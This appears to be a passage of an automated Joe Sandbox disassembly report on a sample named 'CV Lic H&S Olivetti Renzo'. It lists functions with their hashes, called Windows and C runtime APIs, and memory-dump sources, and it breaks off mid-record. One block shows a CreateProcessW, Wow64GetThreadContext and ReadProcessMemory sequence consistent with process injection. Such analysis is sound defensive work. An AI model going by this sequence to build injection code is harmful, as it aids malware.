                                                                                            • Opcode ID: 6f17ad3b0da82acef30f928ae2ee164ce87884b1196e227ead06dd4a17956c25
                                                                                            • Instruction ID: 24dee76302c2820c6cf9280da9760400e4b7e84aadb8fc5b90df8aedf0c40aba
                                                                                            • Opcode Fuzzy Hash: 6f17ad3b0da82acef30f928ae2ee164ce87884b1196e227ead06dd4a17956c25
                                                                                            • Instruction Fuzzy Hash: 0411AC71918340AFC300EF29EC05A4EBBE8FF94710F00891FF584876A2DB708A81CB92
                                                                                            APIs
                                                                                            • ___lock_fhandle.LIBCMT ref: 000EEA29
                                                                                            • __close_nolock.LIBCMT ref: 000EEA42
                                                                                              • Part of subcall function 000E7BDA: __getptd_noexit.LIBCMT ref: 000E7BDA
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                            • String ID:
                                                                                            • API String ID: 1046115767-0
                                                                                            • Opcode ID: ce19ff5212751ee1a8c907bf4818aa684d1992c2aed9b64cab66e824e1ac4c74
                                                                                            • Instruction ID: c0cb9c13fce819f759187f4fffad6b4aa491d8dbbf2fd1918d525ed461d1201f
                                                                                            • Opcode Fuzzy Hash: ce19ff5212751ee1a8c907bf4818aa684d1992c2aed9b64cab66e824e1ac4c74
                                                                                            • Instruction Fuzzy Hash: B011EC729056D88ED312BF66D84139D7A916F81331F2E4358E4247F1E3CBB45D4087A2
                                                                                            APIs
                                                                                              • Part of subcall function 000E395C: __FF_MSGBANNER.LIBCMT ref: 000E3973
                                                                                              • Part of subcall function 000E395C: __NMSG_WRITE.LIBCMT ref: 000E397A
                                                                                              • Part of subcall function 000E395C: RtlAllocateHeap.NTDLL(01910000,00000000,00000001,00000001,00000000,?,?,000DF507,?,0000000E), ref: 000E399F
                                                                                            • std::exception::exception.LIBCMT ref: 000DF51E
                                                                                            • __CxxThrowException@8.LIBCMT ref: 000DF533
                                                                                              • Part of subcall function 000E6805: RaiseException.KERNEL32(?,?,0000000E,00176A30,?,?,?,000DF538,0000000E,00176A30,?,00000001), ref: 000E6856
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                            • String ID:
                                                                                            • API String ID: 3902256705-0
                                                                                            • Opcode ID: bb7881cfdca22e3cb7f8a255db706e29abe71f63457a9bf5b51180c85b7ceb0e
                                                                                            • Instruction ID: 52fa00d5a7b3b39e14b2926bf96fecd1cf184b075cb8bdcdced279aba21a6816
                                                                                            • Opcode Fuzzy Hash: bb7881cfdca22e3cb7f8a255db706e29abe71f63457a9bf5b51180c85b7ceb0e
                                                                                            • Instruction Fuzzy Hash: 96F0A43110425E6BDB04BF99F9019EE7BE89F00354F608126FA09B2392DFB1964086B6
                                                                                            APIs
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • __lock_file.LIBCMT ref: 000E3629
                                                                                              • Part of subcall function 000E4E1C: __lock.LIBCMT ref: 000E4E3F
                                                                                            • __fclose_nolock.LIBCMT ref: 000E3634
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                            • String ID:
                                                                                            • API String ID: 2800547568-0
                                                                                            • Opcode ID: 03bb2242bbef1e6b1cbb3f6bd62ca5ac38cb96027d8d518d11edc4cf7a9e3d4d
                                                                                            • Instruction ID: a6684f6a8d4f1d5d86a2861bc4d4684776ffa96669e7757a33f3f303e2d8da19
                                                                                            • Opcode Fuzzy Hash: 03bb2242bbef1e6b1cbb3f6bd62ca5ac38cb96027d8d518d11edc4cf7a9e3d4d
                                                                                            • Instruction Fuzzy Hash: 24F09631902694AED7116B77880A7AE7EE05F51330F25C109E414BB2D3C77886419A55
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01B2613B
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01B261D1
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01B261F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 2438371351-0
                                                                                            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                            • Instruction ID: 343671bfa8d029a408f459ae2d14bc1d891f35350f00ed8edbd0b78fb2f11490
                                                                                            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                            • Instruction Fuzzy Hash: DA12CD24E14658C6EB24DF64D8507DEB232EF68300F10A0E9D10DEB7A5E77A4F85CB5A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 937e46c6264fbb76f77c58baf3814e21c6ec391d9d6645176bbd13828bed4bca
                                                                                            • Instruction ID: d50628b4c23023fb5c4a1f949e0e856880c961a95e1abec57c228285a7202e06
                                                                                            • Opcode Fuzzy Hash: 937e46c6264fbb76f77c58baf3814e21c6ec391d9d6645176bbd13828bed4bca
                                                                                            • Instruction Fuzzy Hash: 0E71E8719043C09FEB25CF24D489BAA7BD1FB51304F18497EE8858B2A2E375D9C5CB92
                                                                                            APIs
                                                                                            • __flush.LIBCMT ref: 000E2A0B
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __flush__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 4101623367-0
                                                                                            • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                            • Instruction ID: d9a1552a631d05d695c9e773acfd05259da95cc12c6bda234d55eab2ec33e596
                                                                                            • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                            • Instruction Fuzzy Hash: 9F41A2716007869FDB6C8EABC8805AE77EAAF85360B28853DE845E7241EB70DD408B41
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                            • Instruction ID: a71a149a1c4f881e24d4b25a0e8c8d0452bc044853c53550fe562e0c9e971c77
                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                            • Instruction Fuzzy Hash: 9631B374A002459BD758EF58C480A69FBF6FF49340B6486A6E40ACF356DB31EDC1CBA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 3aa6443d97e3252a11448fb2c4ec847f47b20504ef2943dc1a00cfa15ec58312
                                                                                            • Instruction ID: b696f97fab66f0c7f230b961880d425f8abac824078d25648a1a64dd1ed440d7
                                                                                            • Opcode Fuzzy Hash: 3aa6443d97e3252a11448fb2c4ec847f47b20504ef2943dc1a00cfa15ec58312
                                                                                            • Instruction Fuzzy Hash: A131A275104628DFCB06AF10E0906AEB7B0FF48320F21854AEA952B387D774A955CF91
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClearVariant
                                                                                            • String ID:
                                                                                            • API String ID: 1473721057-0
                                                                                            • Opcode ID: 3edc107fa19ce9179449564a1338fdcc41b5305936ad2cb383390386b8419bd9
                                                                                            • Instruction ID: d86b64c9bf741d10d9144f38f2da7b827ab2dfc71e7138fe8bee5291943c0d28
                                                                                            • Opcode Fuzzy Hash: 3edc107fa19ce9179449564a1338fdcc41b5305936ad2cb383390386b8419bd9
                                                                                            • Instruction Fuzzy Hash: 62414870504741CFDB24CF18D484B2ABBE1BF45304F1989ADE99A4B362C776E886CF62
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClearVariant
                                                                                            • String ID:
                                                                                            • API String ID: 1473721057-0
                                                                                            • Opcode ID: 3715043d97b344e2c56243ecb52bac498e7b933870a52c8e87f36eff602ace77
                                                                                            • Instruction ID: b249e0094335ae173cc210f735cad8e602ccc5e4dcb8d6ec62b6c9cffa64edde
                                                                                            • Opcode Fuzzy Hash: 3715043d97b344e2c56243ecb52bac498e7b933870a52c8e87f36eff602ace77
                                                                                            • Instruction Fuzzy Hash: B431F5746047029FD714DF04D094AAABBF1FF89310F15C4AEE98A8B362DBB5E885CB51
                                                                                            APIs
                                                                                              • Part of subcall function 000C4214: FreeLibrary.KERNEL32(00000000,?), ref: 000C4247
                                                                                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000C39FE,?,00000001), ref: 000C41DB
                                                                                              • Part of subcall function 000C4291: FreeLibrary.KERNEL32(00000000), ref: 000C42C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Free$Load
                                                                                            • String ID:
                                                                                            • API String ID: 2391024519-0
                                                                                            • Opcode ID: d5267ed1d9ab390b280240a56982a9af47e4744460d47c99fbe8bf0193a90941
                                                                                            • Instruction ID: ceffb3e4bda4111903c459071282b6c6eb4a3ef1638f5d788789a57b7160c1c9
                                                                                            • Opcode Fuzzy Hash: d5267ed1d9ab390b280240a56982a9af47e4744460d47c99fbe8bf0193a90941
                                                                                            • Instruction Fuzzy Hash: 8911A331600216ABDB14AB74DC27FDE77A9BF40700F50842DF596A61C2DB749A019B60
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClearVariant
                                                                                            • String ID:
                                                                                            • API String ID: 1473721057-0
                                                                                            • Opcode ID: b14d49ad3197a1d7980a9aad3c24b6a2b6132a64094a9596d7bba44cdf5c6819
                                                                                            • Instruction ID: 95e671ab23797ee3fc6688261e8f0fdd955c9530a161a622890df5e8d61283e5
                                                                                            • Opcode Fuzzy Hash: b14d49ad3197a1d7980a9aad3c24b6a2b6132a64094a9596d7bba44cdf5c6819
                                                                                            • Instruction Fuzzy Hash: C3212470508701CFDB24DF68D444B6ABBE1BF84304F14896EEA9A4B722C732E845CF62
                                                                                            APIs
                                                                                            • ___lock_fhandle.LIBCMT ref: 000EAFC0
                                                                                              • Part of subcall function 000E7BDA: __getptd_noexit.LIBCMT ref: 000E7BDA
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$___lock_fhandle
                                                                                            • String ID:
                                                                                            • API String ID: 1144279405-0
                                                                                            • Opcode ID: 04fe4a4196e172954527e5cddbe8757bb3c5776edb73b52342403a9bbb222e4e
                                                                                            • Instruction ID: 5289b8e27f939552a4910198f3c20ec2925608cb406c1c24649f33e0b788b2ea
                                                                                            • Opcode Fuzzy Hash: 04fe4a4196e172954527e5cddbe8757bb3c5776edb73b52342403a9bbb222e4e
                                                                                            • Instruction Fuzzy Hash: C011B2728056C08FD7227FA6984539E3AA09F42331F264250E4383B1E3CBB5AD408BA1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClearVariant
                                                                                            • String ID:
                                                                                            • API String ID: 1473721057-0
                                                                                            • Opcode ID: 3006efac2e617042fead985b3e73bcb3f9160ce21d691c7d8c74060229e302ef
                                                                                            • Instruction ID: 1f21e17c9a74b66389e8f89d021eeec78a8c650307fde01b69caa7557fad68c6
                                                                                            • Opcode Fuzzy Hash: 3006efac2e617042fead985b3e73bcb3f9160ce21d691c7d8c74060229e302ef
                                                                                            • Instruction Fuzzy Hash: 4A1118B46043029FD724CF14D055B66BBF1BF48310F19C4AEE98A4B362D775E885CB52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                            • Instruction ID: 77ca46790d99db1fe5612935ffc210c73b1f76934258309324c676f2d01bf157
                                                                                            • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                            • Instruction Fuzzy Hash: 30013131510109AECF05EFA4C892DFEBB78EF20344F508129B566971A6EB309A49DF60
                                                                                            APIs
                                                                                            • __lock_file.LIBCMT ref: 000E2AED
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit__lock_file
                                                                                            • String ID:
                                                                                            • API String ID: 2597487223-0
                                                                                            • Opcode ID: 9bc18e111e10dea1280d3dffc0eabaf8a81b723be41c163d37253403590a1a7b
                                                                                            • Instruction ID: f6b35bc7dea6b33c96ca3e1597063053623fe2ca7aa3534ab8f78b76b9dfb1a0
                                                                                            • Opcode Fuzzy Hash: 9bc18e111e10dea1280d3dffc0eabaf8a81b723be41c163d37253403590a1a7b
                                                                                            • Instruction Fuzzy Hash: 5DF06231901285EFDF61AF668C067DF36A9BF00350F198429B414BB193DB798A92DB52
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,000C39FE,?,00000001), ref: 000C4286
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 05c77c6b92558f80fc2381ccc6b043611e00b263a2d45cdb1387b7cbe678ae20
                                                                                            • Instruction ID: 3da240c618ab5befc3d7e907c2efcddd464e50c6325f4abf1e1123a049313863
                                                                                            • Opcode Fuzzy Hash: 05c77c6b92558f80fc2381ccc6b043611e00b263a2d45cdb1387b7cbe678ae20
                                                                                            • Instruction Fuzzy Hash: FDF03971505702CFCB749F65E8A6D6ABBE4BF043253658A3EF1D682620C7329980DF50
                                                                                            APIs
                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000C40C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongNamePath
                                                                                            • String ID:
                                                                                            • API String ID: 82841172-0
                                                                                            • Opcode ID: bdc8481e20df265532b0ffcbc71a6ee067028a5d8e73504dd81b0e7e339a8e3e
                                                                                            • Instruction ID: 58ef552e71c70285f2503b92709098206df2f126033843376991b9032c5694f7
